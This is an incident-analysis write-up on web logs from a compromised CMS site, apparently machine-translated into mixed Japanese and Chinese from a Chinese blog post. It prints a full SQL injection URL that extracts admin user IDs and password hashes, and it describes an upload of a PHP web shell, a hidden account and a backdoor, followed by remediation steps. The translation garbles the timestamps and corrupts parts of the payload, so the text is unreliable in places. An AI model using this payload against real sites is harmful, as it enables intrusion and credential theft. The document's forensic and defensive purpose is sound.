シンプルなログ解析

監査ログ(ステータスコード200)から出発して見出さペイロードSQLインジェクション

 

 

ペイロードSQLインジェクションの存在を決定するためにサイトを利用して、攻撃者はアカウントとパスワードを取り戻すための脆弱性を悪用

注入点:http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=

 

ペイロード:

http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//* !50000select * / 1,2,3、(%の20CONCAT(0x7c、ユーザーID、0x7c、PWDを選択)+ + `%23 @__ admin`%の20limit + 0,1)から、5,6,7,8,9%23 @ `\%27` +&_ファイル[タイプ] [名] = 1.JPG&_FILES [タイプ] [タイプ] =アプリケーション/オクテットストリーム&_FILES [タイプ] [サイズ] = 4294

 

 

 アタッカー

[27 /月/ 2019:50:07 0800 15]

 

27 /月/ 2019:15:50:09 0800]

行ったバックグラウンドスキャン

そして、見つかっ存在するログファイルのアップロードの脆弱性を見て

URL:?/dede/file_manage_main.php activepath = /アップロード

ここでは、攻撃者の任意のファイルアップロードの脆弱性と正常にアップロードPHPマレーシアあり

 

 

そこ隠されたアカウントが見つかりました、と残している 5 のシフトバックドアを

 

 

 

 

リハビリテーションプログラム:

1、バックドアを削除するには

2、ファイルアップロード制限グローバル最適化、代わりにホワイトリストをアップロードします

4 ため、URLのトランスコーディングコンパイラ

5、增强密码难度,使用更安全的加密手段

6、在代码层面进行优化,严格判断文件及变量参数的引入,防止未知文件被包含产生威胁

升级cms版本、mysql版本、

 

升级优化之后

 

 

おすすめ

転載: www.cnblogs.com/xiaoyunxiaogang/p/10969170.html